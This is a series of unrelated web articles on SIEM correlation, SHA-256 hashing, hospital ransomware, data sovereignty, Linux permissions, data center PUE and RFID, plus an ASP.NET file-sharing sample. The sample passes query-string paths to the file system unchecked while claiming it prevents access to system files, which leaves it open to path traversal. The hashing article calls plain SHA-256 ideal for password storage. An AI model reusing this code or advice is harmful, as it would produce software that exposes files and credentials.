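    {"user": "bob", "source": "fileserver", "location": "Houston", "time": datetime(2020, 7, 1, 9, 2)},
]

# Flag a user whose activity appears in different locations within a short window.
window = timedelta(minutes=10)
events.sort(key=lambda event: event["time"])
for earlier, later in zip(events, events[1:]):
    if (earlier["user"] == later["user"]
            and earlier["location"] != later["location"]
            and later["time"] - earlier["time"] <= window):
        print("ALERT:", earlier["user"], "active in", earlier["location"],
              "and", later["location"], "within", window)

A production SIEM does this at far greater scale and across many more event types, but the principle is the same: individually unremarkable log entries become meaningful once they are correlated.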
If You Don’t Have An SIEM Yet, You Need To
At Digital Uppercut, no Cybersecurity plan is complete without a properly configured SIEM standing guard over your business and sending up alarms when there are issues. We let our clients know that an SIEM is critical to the success of any Cybersecurity plan, and we regularly install SIEMs in companies as small as just a few employees and as large as thousands of employees. In every environment, they have successfully identified incidents and helped us to block activities that could have otherwise crippled the organization. If you don’t have an SIEM yet, it’s time for us to talk. Contact us online today, or call us at 818-913-1335. | <urn:uuid:31e1a8a5-e41c-4351-ba0b-ffc150642da3> | CC-MAIN-2022-40 | https://www.digitaluppercut.com/2020/07/why-an-siem-is-critical-to-your-cybersecurity-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00593.warc.gz | en | 0.957746 | 1,449 | 2.6875 | 3 |
What Is the Most Secure Hashing Algorithm?
Beef up your data protection security with the most secure hashing algorithm. Learn how a one-way function can unlock your ability to truly excel in cybersecurity, protecting your sensitive data with virtually irreversible and unique hashes
2021 marked one of the most active years for cyberattacks and data breaches with software vendors experiencing the largest year-on-year growth ever (146%). As such, it’s hardly surprising that organizations are implementing smarter measures to tighten up the security of sensitive data and passwords in a more proactive way.
Well-known companies like Microsoft, TrendMicro, and GitHub are now dropping the SHA-1 algorithm because it’s been deprecated as a standard. This algorithm, used for years as an effective way to validate and protect the integrity of files, documents, and other types of data, has been deprecated (i.e., obsoleted) and replaced. But what has it been replaced with? That’s part of what we’ll explore in this article on the most secure hashing algorithm.
In this article, you'll learn about the power of the most secure hashing algorithm, its key role in data integrity, and how it can help your organization withstand data breach threats while complying with data security regulations and standards.
What’s the Most Secure Hashing Algorithm? SHA-256
SHA-256 (secure hash algorithm) is an algorithm that takes an input of any length and uses it to create a 256-bit fixed-length hash value. It doesn’t matter whether you hash a single word or the contents of the Library of Congress — the resulting hash digest will always be the same size. The “256” refers to the hash digest length.
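As a quick illustration (a minimal Python sketch using the standard hashlib module; the sample strings are arbitrary), inputs of wildly different sizes always yield a 64-character hexadecimal digest:

import hashlib

for text in ["hi", "the quick brown fox", "a" * 1_000_000]:
    digest = hashlib.sha256(text.encode()).hexdigest()
    print(len(digest), digest[:16] + "...")  # the length is always 64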
SHA-256 is one of the hashing algorithms that’s part of the SHA-2 family (patented under a royalty-free U.S. patent 6829355). It’s the most widely used and best hashing algorithm, often in conjunction with digital signatures, for:
- Authentication and encryption protocols, like TLS, SSL, SSH, and PGP.
- Secure password hashing and verification.
- Cryptocurrency transaction verification (e.g., Bitcoin, 21Coin, Peercoin).
- Tokenization, which replaces sensitive data (e.g., credit card numbers, account IDs, etc.) with an unrecognizable string of random data during data transfers.
- File and software integrity checks (e.g., when a user downloads a signed file or code). The hash included in the code signing certificate will be recalculated and compared to establish the file or code’s integrity.
- Verifying the authenticity of messages or documents.
SHA-256 is a NIST (National Institute of Standards and Technology) recommended and officially approved standard algorithm. Thanks to the possibility of verifying the content of data without exposing it, it's also used by many governments and public-sector agencies worldwide, including in the U.S. and Australia. But what are the key features making this algorithm so popular among technology leaders and so secure that it's considered the most secure hashing algorithm available to date?
1. It's a one-way algorithm. This means that it's infeasible (too demanding in terms of time and resources) to reconstruct the original input from the output. Even through a brute force attack, an attacker would have to figure out the right combination of 0s and 1s — out of 2^256 different possibilities (i.e., more combinations than the number of atoms in the universe) — to generate the initial data of an SHA-256 hash. To put it another way, it's the equivalent of 1.158 x 10^77, or 115,792,089,237,316,195,433,570,985,008,687,907,853,269,984,665,640,564,039,457,584,007,913,129,639,936.
2. The chances of collision are extremely low. In fact, there is only a one in more than 115 quattuorvigintillion (a 78-digit number) chance of collision.
3. Minor change = drastically different output. Even the most insignificant alteration to the original input always produces an entirely different output (what's known as the avalanche effect; a short demonstration follows this list). This makes it even more difficult for an attacker to use statistical analysis to predict the content of the original data.
4. SHA-256 has not been broken. Seriously. To date, no one has managed to crack it, even though there is a huge financial incentive to do so. Whoever succeeds in reverse engineering SHA-256 would be able to mine Bitcoin faster than anyone else and would end up making a huge amount of money.
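Here is the short demonstration promised in point 3 above, again a minimal Python sketch with arbitrary sample strings; changing a single character produces a completely unrelated digest:

import hashlib

for text in ["transfer $100 to account 42", "transfer $900 to account 42"]:
    print(text, "->", hashlib.sha256(text.encode()).hexdigest())
# The two digests share no recognizable pattern, even though the inputs differ by one character.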
What’s a Hash Algorithm?
As we touched on earlier, a hash algorithm is a function that takes an input of any length and scrambles it into an output of a fixed length (the hash value or digest). If the input is altered, the associated hash value changes as well. This means that with a hash algorithm you can immediately spot whether a file or piece of code has been changed (it has a different hash value) or whether two files are identical (your calculated hash value matches the one provided with the file).
A matching hash is a confirmation that the associated file or code is uncompromised — that it is what it claims to be and hasn't been manipulated or altered. In other words, a hash function protects the integrity of the data or file in question.
To give you a practical example, the hash algorithm follows the same principle as the last digit of a bar code. This number, which is called a check digit, is always determined by the digits that precede it. If one of those digits changes, the check digit changes too, which is how the error gets caught. Without that check, a computer store might end up with a cupcake in its inventory because of a single mistyped digit.
4 Reasons Why a Hash Algorithm Is Important
Hashing algorithms have come a long way since they were first devised decades ago and, thanks to their key attributes, they're now an essential part of cybersecurity. Every hash function is:
- Easy to compute in one direction. Generating a hash value from any kind of data is easy, no matter the size of the original file. However, it’s very difficult to calculate back the value of the original input.
- Deterministic and not random. A hash algorithm is like a fingerprint: your thumb will always leave the same fingerprint. The same happens with hashing algorithms. Hashing a distinct input will always deliver the exact same hash value. This means that if two people check the hash value of the same file or code, they’ll be able to determine its authenticity as they should both get the same answer.
- Impossible to modify the input without changing the resulting hash value. Do you remember the avalanche effect we talked about toward the beginning of this article? This is exactly that. If the original file changes, even if the change is small, so does the output. This makes it really easy to verify the integrity of any file or code.
- Resistant to collisions. In other words, it should be difficult to find two different inputs (e.g., files or codes) with the same hash value. This is important if you’re distributing files on the web, for example. Without resistance to collision, an attacker could replace the original file with an infected one using the same hash. The file would appear authentic as it would have the same hash as the real file. As a result, when a user downloads it, its device will be infected.
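To make that file-distribution scenario concrete, here is a small Python sketch of an integrity check; the file name and the published digest are placeholders, not real values:

import hashlib

def sha256_of_file(path, chunk_size=65536):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Placeholder for the digest the publisher lists next to the download link.
published_digest = "0000000000000000000000000000000000000000000000000000000000000000"

if sha256_of_file("downloaded-installer.bin") == published_digest:
    print("File matches the published hash - integrity verified")
else:
    print("Hash mismatch - the file was altered or corrupted in transit")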
Do you want to know more about hashing algorithms? Check our previous article and Computerphile’s hashing algorithms and security video:
- SHA-256 takes a plaintext input and returns a unique, fixed length output. A 256-bit output (32 bytes) displays as 64 hexadecimal alphanumeric characters ranging from [0-9] and [A-F].
- Security benefit 1: Ideal for password protection and verification, storing password hashes instead of plaintext passwords is much more secure.
- Security benefit 2: Perfect for code/data integrity checks through code signing certificates, enabling you to verify if the code or file has been tampered with, thus minimizing the risk of malware infections and corruption.
- Its output looks completely random and is unreadable. The resulting hash digest includes no identifying information about the original input.
- A hash is a one-way function. Basically, it has only one output for each input. On the other hand, there is a practically unlimited number of different inputs that could map to the same output, making it virtually impossible to reverse engineer, as explained in an excellent video made by Matthew Weathers. This differs from encryption, which is a two-way function that's intended to allow its original input to be computed from the output by the private key holder.
- Security benefit: Being infeasible to reverse makes it a powerful tool against even more sophisticated attacks.
Sure enough, if used correctly, it can help protect your organization from data breaches. Moreover, with the expansion of cloud services and IoT, a robust algorithm like SHA-256 has become a key player in preserving privacy and integrity, and in ensuring secure communication among connected devices on the otherwise insecure internet.
This gets us nearly at the end of our journey into the most secure hashing algorithm world. Before we wrap up though, let’s have a quick look at how SHA-256 — considered the most secure hashing algorithm — differs from the other SHA families.
Not All SHA Families Are the Same: Learn the Differences
As mentioned by the Cybersecurity & Infrastructure Security Agency (CISA) in its hash function definition, SHA is divided into two different families:
- SHA-1 (Secure Hash Algorithm-1), and
- SHA-2 (including SHA-256).
You may have noticed that we didn’t include SHA-3 in the list. As its internal structure is pretty different from the previous two and it’s based on a new approach, SHA-3 has to be kept separate when discussing SHA families. We’ll talk more about it in one of our next articles but won’t get into all of that right now. For now, let’s stick with our topic of SHA-1 and SHA-2.
Published in 1995, SHA-1 was the first widely deployed version of the secure hash algorithm. Even though SHA-2 is in some ways its updated version, and both share a similar underlying construction derived from the MD5 lineage, they are two distinct families that differ from each other in many ways. How? Let's see.
SHA-1 vs. SHA-256 – Comparison Table
| | SHA-1 | SHA-256 |
|---|---|---|
|Generated hash value|160-bit (20 bytes), displayed as a 40-digit hexadecimal string.|256-bit (32 bytes), displayed as 64 hexadecimal alphanumeric characters.|
|Hash key features|Shorter code, which results in fewer possible unique combinations (and thus a greater probability of collisions).|Extended code with a more complex hash value, so the possibility of collision is nearly nil.|
|Typical usage|Still used to sign some old SSL certificates, even though from 2016 all newly issued SSL/TLS certificates must use SHA-2.|Most used worldwide, from digital signatures to software integrity checks, and from blockchain to password hashing.|
|Security strength|Weak and susceptible to attacks (e.g., brute force). In fact, when a 2005 study showed the feasibility of breaking the SHA-1 algorithm, NIST quickly proposed in 2006 that the U.S. federal government move to SHA-2.|High.|
|Has it been broken?|Yes, in 2017, when Google announced the first collision.|Still unbroken.|
|Current status|Deprecated.|Widely used and known as the most secure hashing algorithm.|
Final Thoughts on What Is the Most Secure Hashing Algorithm
At the time of writing, SHA-256 is still the most secure hashing algorithm out there. It has never been reverse engineered and is used by many software organizations and institutions, including the U.S. government, to protect sensitive information. It's so secure that it's even a central part of Bitcoin's cryptographic protocol.
Now that you know what the most secure hashing algorithm is, don’t leave your data integrity at risk by relying on old and vulnerable cryptographic systems. There’s a much more powerful and secure hash mechanism available at your fingertips! Move to SHA-256 today and enhance your data security protection now.
Remember: Although it took years to build your organization’s reputation, it only takes a few minutes of a cybersecurity incident to destroy it. | <urn:uuid:53227e30-0ee0-40a0-84d4-abcb52c7d152> | CC-MAIN-2022-40 | https://codesigningstore.com/what-is-the-most-secure-hashing-algorithm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00593.warc.gz | en | 0.901556 | 2,737 | 2.625 | 3 |
As cases surge amidst an ongoing pandemic, hospitals face another crisis: ransomware. Dozens of hospitals have been targeted over the past few days and, in September, the RYUK ransomware strain impacted the IT systems of all 250 U.S. Universal Health Services facilities.1 Employees described a chaotic situation, where medical professionals resorted to using pen and paper for record-keeping.
Losing access to medical data and applications in a modern healthcare setting can have severe financial and potentially life-threatening consequences. In June, the University of California, San Francisco paid over $1.14M to attackers2. In September, a German woman seeking treatment died after a hospital was forced to reroute her due to a ransomware attack.3
Specifically Targeting Healthcare
In late October 2020, the FBI warned that ransomware is “an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers.”4 Obviously, the warning combined with the ongoing attacks means that healthcare systems must take timely and reasonable precautions to protect their networks.
Most of these recent attacks on healthcare organizations reportedly stem from a group of Russian cybercriminals who hold a list of over 400 potential healthcare targets, according to Hold Security.5
Underlying Technology and Methods
During this wave of ransomware attacks, the RYUK strain of malware has emerged as a primary vehicle to target healthcare environments. The initial compromise is generally performed through malware typically distributed via phishing emails. The malware helps establish a covert command and control channel into the compromised network. | <urn:uuid:48f4a4ef-7b4e-40b5-be22-3163a0437304> | CC-MAIN-2022-40 | https://www.cycognito.com/blog/ransomware-plagues-healthcare-with-disruptive-and-potentially-devastating-consequences | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00593.warc.gz | en | 0.946123 | 308 | 2.65625 | 3 |
Viewing data sovereignty through a narrow lens may suffocate growth. It is recommended to deploy progressive and forward-thinking cyber strategies as we transition into a highly digital post-pandemic world.
Data privacy and protection have turned to be a point of contention as users’ private and confidential data is perceived to be easily accessible, ready to be tested, and replicated by machines for analyzing user behavior, surveillance, advertising, and other malicious objectives.
In the first half of 2020, Covid-19 upended ‘business as usual,’ and global relations were tested as governments focused on protecting jobs and appeasing impatient citizen groups. Data sovereignty has remained a heated discussion topic since European states enacted the GDPR.
Over in Asia, nations with huge populations like Indonesia and India have been evaluating options to safeguard citizens’ data, and keeping data ‘on-soil’ has become part of the vernacular among politicians. And today, even as rules are enacted to enforce data privacy, data sovereignty and protection can still be a burning issue.
Cyber risks and threats exist no matter where data is stored – it is the execution of robust cybersecurity strategies that can efficiently protect businesses and citizens’ data.
Instead of a repressive and authoritarian approach to data management under the pretext of ‘the good of all,’ one would be better off promoting an open system in which innovation, trade, and economic growth can flourish while ensuring private and confidential data stays in safe and responsible hands.
Many nations face common technical challenges while trying to mitigate risks in the face of conflicting priorities. The following cybersecurity strategies will allow businesses to untangle the web of confusion, remove the reclusive mentality, and start embracing digital ecosystems confidently.
Approach cybersecurity holistically
To mitigate the fear of data breaches and cyber threats, enterprises need to adopt an intelligence-centric mindset. The statement ‘knowledge is power’ is highly relevant here. Leaders need to estimate the risks coming from the outside and be well prepared and equipped to handle adversaries before actual cyber-attacks break out.
A thorough understanding of the “who, what, and why” of threat actors is important to counter any probable attack. A holistic view of the threat landscape gives cybersecurity teams insight into digital risk, cyber-attacks, vulnerabilities, hackers’ interests, out-of-band activity, early-warning indicators, malware, and phishing campaigns, helping them gauge looming cyber threats and risks.
Cybersecurity teams need to deploy a comprehensive approach to managing data, and this requires management, strategic, and tactical cyber-intelligence. Such a multi-layer deployment involves not merely security operations personnel but also governance and risk leaders. Corporate risk policy changes are required to ensure that cyber threats do not turn into cyber-attacks.
Regulatory environment that needs to change
Governments may have enacted cyber laws, but enacting them is not the same as enforcing them. Another critical step would be to impose mandatory risk and vulnerability assessments, at least biannually, on large enterprises. This will help identify real-time threats, and remediation can take place to close any existing cybersecurity gaps.
Another approach would be to start attack vector assessments at least annually. These assessments will unveil new attack surfaces as firms adopt new digital formats and establish further supplier-partner-customer connectivity.
A cyber reward culture can be cultivated where the discovery of vulnerabilities and bugs are rewarded. This effort will help the cybersecurity community grow and promote a culture of joint solutions and knowledge sharing.
People, Process, Technology, and Governance
For many SMBs looking to ensure cyber resilience, it is crucial to build a basic level of cyber hygiene. The priority is ‘people’: employees must be educated on cyber threats and existing risks. This is particularly vital to eradicate the prevalence of social engineering campaigns and phishing attacks.
From the technology perspective, businesses need to incorporate layered defenses with gateway-based security, data security, endpoint security, automated scanning, regular monitoring, and malware removal.
Antivirus solutions, data protection and loss detection, and VPN solutions need to be incorporated. When it comes to processes, firms should perform threat profiling, threat segmentation, risk containerization, and zoning.
Keeping core content encrypted is both necessary and prudent. The basic process of daily data backup is a sensible policy to adopt too. On governance, businesses should establish a strong cyber threat visibility and intelligence program to support a robust cybersecurity strategy.
Innovation, open systems, entrepreneurship, interconnection – these are the approaches that open up fresh growth possibilities.
It is prudent to deploy progressive and forward-thinking cyber strategies as the world marches into a totally digital post-pandemic world. | <urn:uuid:5fc57acf-be0b-4aa8-a908-1d8b1142706d> | CC-MAIN-2022-40 | https://itsecuritywire.com/featured/data-sovereignty-and-progressive-cyber-security-strategies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00593.warc.gz | en | 0.919209 | 960 | 2.53125 | 3 |
A vulnerability in Chromium-based browsers would allow attackers to bypass the Content Security Policy (CSP) on websites to steal data and execute dangerous code.
Chrome 73 versions (March 2019) to 83 are affected (84 was released in July 2020 and solves the problem). CSP is a web standard that aims to frustrate certain types of attacks, including site scripts (XSS) and data injection attacks. CSP allows web administrators to specify areas that a browser should consider valid sources of executable scripts.
A CSP-compatible browser will then only execute scripts loaded from source files received from those domains. "CSP is the primary method used by website owners to implement data security policies to prevent the execution of harmful code on their website, so that when it can be bypassed, the user's personal data is at risk," Weizman explained in research published on Monday, August 10.
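As a rough illustration of the mechanism (not code from Weizman's research), a site owner might set a CSP header the way the sketch below does. It assumes the Flask library is available, and the CDN domain is a placeholder.

# Minimal sketch: send a Content-Security-Policy header so the browser only
# runs scripts from approved origins. Domains are placeholders.
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/")
def index():
    resp = make_response("<h1>Hello</h1><script src='/static/app.js'></script>")
    # Scripts may only load from this site or the named CDN; inline scripts
    # and any other origin are refused by a CSP-compliant browser.
    resp.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src 'self' https://cdn.example.com"
    )
    return resp

if __name__ == "__main__":
    app.run()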
“To better understand the scale of this vulnerability – potentially affected users are billions, Chrome having over two billion users and over 65% of the browser market on the one hand, and some of the most popular websites on the web being vulnerable to this CVE on the other,” says Gal Weizman.
The vulnerability (CVE-2020-6519) ranks as a medium-severity security issue (6.5 out of 10 on the CVSS scale – Common Vulnerability Scoring System).
However, because it affects the application of CSP, it has vast implications, Weizman said, comparing it to a car that has problems with seat belts, airbags and collision sensors.
The vulnerability was present in Chrome browsers for more than a year before it was fixed, so Weizman warned that the full implications of the bug are not yet known.
Make sure your Chrome browser version is 84 or higher.
Users should update their browsers to the latest version to avoid becoming a victim of this vulnerability. If sites offer dedicated applications, use them instead of accessing those sites through the browser.
This week: Linux File Permissions
To maintain proper security, users should have exactly the level of access that they need to do their jobs — no more, no less. That's why knowing how to manage and maintain file permissions is an understated, but incredibly important, skill. Knowing when to chmod versus chown or use a uid or gid is all part of the job.
This week, we give you a crash course in Linux permissions, executables, and the fundamentals of uid and gid.
When it comes to administering and securing Linux environments, understanding umask and file permissions is crucial. Learn how both of these factor into Linux security.
Setuid and setgid are a way for users to run an executable with the permissions of the executable's owner or group. Learn why they are so crucial and how Linux admins can leverage them.
User identifier (uid) and group identifier (gid) are fundamental concepts that any Linux system administrator needs to know. Learn what they do and how they play a role in file permissions. | <urn:uuid:3d02bd03-13ce-4a4a-a171-63722674c44a> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/system-admin/this-week-linux-file-permissions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00593.warc.gz | en | 0.919834 | 210 | 2.921875 | 3 |
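To see how permission bits, uid and gid fit together in practice, here is a minimal Python sketch; the path is just an example and it assumes a Unix-like system.

# Inspect ownership and permission bits of a file, roughly what `ls -l` shows.
import os
import stat
import pwd
import grp

info = os.stat("/etc/passwd")
mode = stat.S_IMODE(info.st_mode)            # permission bits, e.g. 0o644
owner = pwd.getpwuid(info.st_uid).pw_name    # resolve uid -> username
group = grp.getgrgid(info.st_gid).gr_name    # resolve gid -> group name
print(f"{oct(mode)} {owner}:{group}")

# Tightening permissions from code is the equivalent of `chmod 600 <file>`:
# os.chmod("/path/to/secret", 0o600)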
One of the most common requests I hear is to provide an “easier-than-easy” way to make documents available on the web. Easy is a web form with a file upload control, so that won’t cut it. Easier-than-easy refers to the same drag-and-drop simplicity that users are accustomed to when sharing files over a network.
This sample application provides a web-based interface to a file system. It is coded in ASP.NET, and showcases the framework's ability to send files over HTTP with minimal code.
Starting with line 3, we point the application to the home directory. It makes sense to define a top-level folder in the application and work with paths relative to it. This is so that a user can't pass "c:\" to the web application and get at system files; only resources within c:\webshare are available.
Lines 4 and 5 attempt to retrieve parameters from the HTTP request, identifying whether the user has clicked a link to a file or a subdirectory. If a file has been requested, lines 8 and 9 format the HTTP response so that it prompts the user with a download dialog. Line 11 is the method call that actually sends the file – Response.WriteFile() is a new feature in .NET that helps abstract away some of the complexities of file I/O.
If a file link wasn’t clicked, we check to see if a subdirectory link was clicked. If not, we print the listing of the base folder. If a subdirectory was clicked, we change the current folder and get its listing instead.
When looping through the directories and files to create links, we trim off the base folder part of the path using the substring method. Even if a user of this application views the page source, there will be no indication of where these files are actually housed on the server.
You need to be careful not to print any stray HTML tags when returning a file. Anything else written to the HTTP response can potentially corrupt the file’s contents. It’s a good idea to include lines such as 10 and 12 to flush the Response before writing the file and end it when the file is sent.
I also have a version of this application coded in Java, and would be happy to send the source to anyone who emails me for it.
3: Dim BaseFolder as String = "c:\webshare"
4: Dim RequestedFile as String = Request.QueryString.Get("file")
5: Dim CurrentFolder as String = Request.QueryString.Get("dir")
6: if Not RequestedFile Is Nothing then
7: Dim file as new FileInfo(BaseFolder + "\" + RequestedFile)
8: Response.ContentType = "application/octet-stream"
9: Response.AddHeader("Content-Disposition", "attachment; filename=""" + file.Name + """")
10: Response.Flush()
11: Response.WriteFile(file.FullName)
12: Response.End()
13: else
14: if CurrentFolder Is Nothing then
15: CurrentFolder = BaseFolder
16: else
17: CurrentFolder = BaseFolder + "\" + CurrentFolder
18: end if
19: Dim dir As New DirectoryInfo(CurrentFolder)
20: Response.Write("<b>" + CurrentFolder.Substring(BaseFolder.Length) + "</b><br>")
24: Dim subdir as DirectoryInfo
25: For each subdir in dir.GetDirectories()
26: Response.Write("<a href=""?dir=" + subdir.FullName.Substring(BaseFolder.Length) + """>" + subdir.Name + "</a><br>")
27: Next subdir
31: Dim file As FileInfo
32: For Each file In dir.GetFiles()
33: Response.Write("<a href=""?file=" + file.FullName.Substring(BaseFolder.Length) + """>" + file.Name + "</a><br>")
34: Next file
Cybersecurity Explained as Physical Security
We often need to think about security in the context of both physical security and digital security. The act of a cyber attack is typically not a singular event. Oftentimes we see hackers using multiple levels of probing before they execute their attack. We are going to reference each action that happens during the typical cyber-attack and relate it to the physical security of your home.
The Drive-by Scan:
If you are connected to the internet, you are susceptible to all sorts of drive-by attacks and drive-by scans. These scans are an initial phase of data gathering and investigation, typically executed by a bot. In the physical realm, this is where a criminal may be driving by in their car looking at your house. They may be looking at the windows or the door and seeing what shape they are in. They are looking to see if you might have a window open that they might be interested in.
On the digital side of that analogy, this is where a threat actor runs a scan against your public IPs or other public-facing assets to learn which ports you have open and which services are listening on them, with or without SSL certificates. The threat actor then starts to understand a little about your footprint from a digital perspective.
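To make the idea of a scan concrete, here is a deliberately minimal Python sketch; the target address is a documentation-range placeholder, and you should only probe hosts you own or are authorized to test.

# Try to open a TCP connection to a few common ports and report their state.
import socket

target = "203.0.113.10"                      # placeholder address
for port in (22, 80, 443, 3389):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(1.0)
        state = "open" if s.connect_ex((target, port)) == 0 else "closed/filtered"
        print(f"{target}:{port} {state}")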
The Deeper Scan
At this point, they have garnered enough information about your environment and move on to a deeper investigation. We call this a deeper scan. On the physical side, this would be where somebody pulls into your driveway. They might even walk up to your door and act like they are dropping something off.
Next, once the bot has done all of its work, a deeper-level scan is started by an actual human being. This is the first time the attacker attempts to access your environment. In the physical realm, this is where somebody walks up to the door, maybe tests the handle, or walks around the back of your house and notices that you have a door that is unlocked.
The First Attempt
Everybody, at some point in time, becomes comfortable with their current security configuration. When people become complacent, they start leaving a door or window unlocked when they leave. The same thing happens a lot in the digital realm. Not everybody realizes that a criminal hacker can gain access to an environment without you even knowing it. A hacker may gain access to your environment and not touch anything: they look around and get back out, which then tends to lead into the attack.
The First Attack
Over the course of the last week or two, the attackers have noticed that you have made zero changes. They have figured out the configuration that you are comfortable with. They then go in and start the attack. We saw this with a prospective client: a digital forensics firm discovered that the attack had unfolded over the course of multiple months. After the first attack, the intruders were able to ransom the environment. The prospective client then had two choices: either pay the ransom or restore their data and servers.
Modern technology runs on electricity, and the computers and data centers at the core of daily life require a lot of it. One report from the 2013 Annual Energy Outlook estimated that computers and related equipment accounted for 3% of the United States’ energy consumption. In the search to maximize energy efficiency, many companies are looking into ways to minimize this energy consumption by computers and related equipment. One way many companies are doing this is by benchmarking their data center’s energy efficiency, which is critical to decreasing power use and related costs.
Benchmarking helps companies understand their current efficiency and gives them a metric to judge efficacy as they implement new efficiency best practices. One benchmarking standard commonly used for data centers is PUE. So what is PUE, and how can it be used to improve your data center’s efficiency?
What Does PUE Mean?
PUE stands for Power Usage Effectiveness. The idea was proposed and developed by The Green Grid, a nonprofit IT industry group of experts from different disciplines who collaborate on ways to improve energy efficiency in the industry. Since its introduction, PUE has become the primary metric professionals use to measure energy efficiency in data centers.
IT professionals use PUE as a benchmarking system to determine the energy efficiency of their data centers and monitor efficiency changes over time. Essentially, PUE compares the total energy entering a data center to the energy used by that data center’s IT equipment. The resulting number quantifies how effective the data center is at using the input power. Experts can use this number to understand how the data center compares with similar data centers in similar locations and conditions and determine whether the company needs to improve efficiency through technological or architectural changes.
How to Calculate PUE
The calculations to determine PUE data center numbers are relatively straightforward, but require careful measurement and regular implementation. The general PUE data center formula is simple — PUE can be calculated by dividing total facility power by IT equipment power. These values are defined and explained below:
- Total facility power: Calculating PUE effectively requires knowing how to measure total facility power. Know what components are at play in your data center and how to monitor their performance using the appropriate meters and sensors. You’ll also want to consider building management software that continually monitors power consumption for the facility.
- Find the total IT load: Measure the power delivered directly to your IT equipment to find the IT load for your data center. This can usually be calculated by using meters to measure activity at the uninterruptible power supply (UPS) and the power distribution unit (PDU).
A value of around 2.0 is average, while a higher value is considered inefficient and a lower value is considered efficient.
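As a simple illustration of the formula, here is a short Python sketch; the kilowatt figures are made-up examples rather than measurements from a real facility.

# PUE = total facility power / IT equipment power.
def pue(total_facility_kw: float, it_equipment_kw: float) -> float:
    if it_equipment_kw <= 0:
        raise ValueError("IT load must be positive")
    return total_facility_kw / it_equipment_kw

# A facility drawing 1,500 kW overall while its IT gear draws 900 kW:
print(round(pue(total_facility_kw=1500.0, it_equipment_kw=900.0), 2))  # ~1.67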
How to Use PUE
While the PUE value is important, it is most valuable when tracked carefully and repeatedly over time. Green Grid gives the following guidance for calculating and using PUE and how to improve data center PUE using this information:
- Take measurements: The first step should be to take a thorough reading of your facility’s total power usage and total IT load. Use these measurements to get an overall PUE measurement. This measurement will help determine a course of action.
- Set your objectives: PUE means nothing if it doesn’t inform goals. Create an efficiency improvement plan based on your measurements. This plan may be as simple or as complex as you’d like but should use PUE to set quantifiable and achievable goals. Be sure to set up sensors in appropriate locations to monitor the right areas for specific goals, such as cooler power usage.
- Develop a testing schedule: Regularly test and calculate PUE in your data center. This can easily be programmed as a continuous measurement automated through your software system. Doing this allows your decisionmakers to collect and review PUE data regularly and view both overall PUE for the data center as well as detailed hour-by-hour fluctuations that may help determine how to handle peak loads.
- Take action: Use the data collected to your advantage. Use modeling tools to analyze and adjust airflow, eliminate idle servers, adjust cooling infrastructure settings and update outdated tech. Use tests to determine if the changes have made significant improvements and repeat the cycle as many times as needed.
Following these steps can help leverage PUE to your company’s advantage, and there are many advantages PUE can offer.
The Benefits of PUE
As discussed previously, data centers consume massive amounts of energy. One study found that U.S. data centers consumed approximately 70 billion kilowatt-hours in 2014, which is about 1.8% of national electricity consumption. This power usage represents both an environmental and a cost concern to many businesses. With the introduction of PUE, however, businesses now have a way to quantify efficiency. This presents numerous benefits, including the following:
- Environmental benefits: Energy consumption represents a massive carbon footprint within the IT industry. Previously, companies did not have a way to quantify efficiency, which made it easier to lose track of this value. PUE creates a simple system to quantify efficiency, which makes it easier for businesses to visualize, prioritize and implement efficiency initiatives. This has effectively increased the creation of eco-friendly computing centers.
- Resource utilization: Implementing a PUE monitoring plan is a great way to visualize and monitor all areas of a data center. The resulting data can be used to identify wasted or under-utilized resources, allowing decisionmakers to reallocate those resources effectively.
- Decrease costs: The ultimate bottom line for any business is cost, and using PUE is a great way to help save money. Maximizing efficiencies can save money on electricity bills and ensure that resources are used effectively.
By automating PUE calculation and analysis, your business can maximize these benefits by eliminating manual intervention. As advanced systems become more readily available, we may see these calculations even used to manage energy sources and optimize efficiencies automatically.
Learn More From DataSpan
If you want to learn more about calculating or leveraging PUE for your data center, DataSpan can help. For more than 40 years, DataSpan continues to be a national technology solutions provider. From IT physical infrastructure to data center IT services, we help our customers accomplish more with fewer resources.
Contact DataSpan today to learn more about our services and how they can help your business improve efficiencies. | <urn:uuid:3d315255-7ff5-469e-843d-2e65bada57be> | CC-MAIN-2022-40 | https://dataspan.com/blog/data-center-pue/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00793.warc.gz | en | 0.925125 | 1,309 | 2.765625 | 3 |
Businesses are always on the lookout for methods of improving efficiency in their operations. For many, automation and technology are attractive choices, though some options may be prohibitively costly for smaller businesses. One option that has caught the attention of businesses of all sizes is radio frequency identification, or RFID.
RFID is a highly versatile wireless identification and tracking technology that can be applied at any level of the supply chain for businesses of every size. Businesses that have implemented RFID have found significant improvements in efficiency and cost reduction, among other areas. This article explains the details of RFID, how it works, the benefits of such a system and how to implement an RFID system in your own business.
What Is RFID?
Radio frequency identification is a type of wireless technology. In an RFID system, there are two key components — an RFID tag and an RFID scanner:
- RFID tag: An RFID tag or smart label consists of an integrated circuit and antenna. The tag is essentially a small microchip that contains encoded digital data and can pick up signals and transfer data using its antenna. While the microchip is extremely small, it can hold massive amounts of this encoded data, and that data can be changed or updated as needed. Data typically includes identification information, product data or other information depending on the application.
- RFID scanner: An RFID scanner is a specialized scanner that collects the information stored in the RFID tag. The information is transferred from the microchip to the scanner using radio waves, meaning that the scanner does not need a direct line-of-sight alignment with the chip to read it. The scanner can also pick up information from multiple tags at once.
